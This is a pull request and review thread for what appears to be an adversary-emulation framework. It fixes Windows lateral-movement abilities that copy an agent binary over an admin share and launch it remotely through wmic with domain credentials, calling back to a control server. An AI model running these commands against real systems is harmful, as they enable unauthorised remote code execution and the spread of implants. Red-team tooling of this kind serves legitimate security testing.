### PR TITLE
virts-1560

### PR DESCRIPTION
**Pull request by ArtificialErmine**
Clean up standard windows lateral movement path to actually work

### CODE REVIEW

File: data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml [hunk 1]
```diff
@@ -11,7 +11,7 @@
     windows:
       psh:
         command: |
-          wmic /node:`"#{remote.host.fqdn}`" /user:#{domain.user.name} /password:#{domain.user.password} process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group} -executors psh";
+          wmic /node:`"#{remote.host.fqdn}`" /user:`"#{domain.user.name}`" /password:#{domain.user.password} process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group} -executors psh";
```
Comment (christophert) [inline data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml:14]: We should probably also surround the password in quotes to be safe. I'm pretty sure the flag will ignore the surrounding quotes for the password as well.

File: data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml [hunk 2]
```diff
@@ -11,7 +11,7 @@
         command: |
           $path = "sandcat.go-windows";
           $drive = "\\#{remote.host.fqdn}\C$";
-          Copy-Item -v -Path $path -Destination $drive"\Users\Public\svchost.exe";
+          Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
         cleanup: |
           $drive = "\\#{remote.host.fqdn}\C$";
           Remove-Item -Path $drive"\Users\Public\svchost.exe" -Force;
```
Comment (christophert) [inline data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml:17]: The cleanup command needs to reflect the change to the filename.

**Review by christophert — CHANGES_REQUESTED** [review]
comments

File: data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml (hunk 1 above)
Comment (ArtificialErmine) [reply data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml:14]: Sounds like a plan.

File: data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml (hunk 2 above)
Comment (ArtificialErmine) [reply data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml]: That's what I get for trying to do this from memory.

**Review by christophert — APPROVED** [review]

**Pull request merged**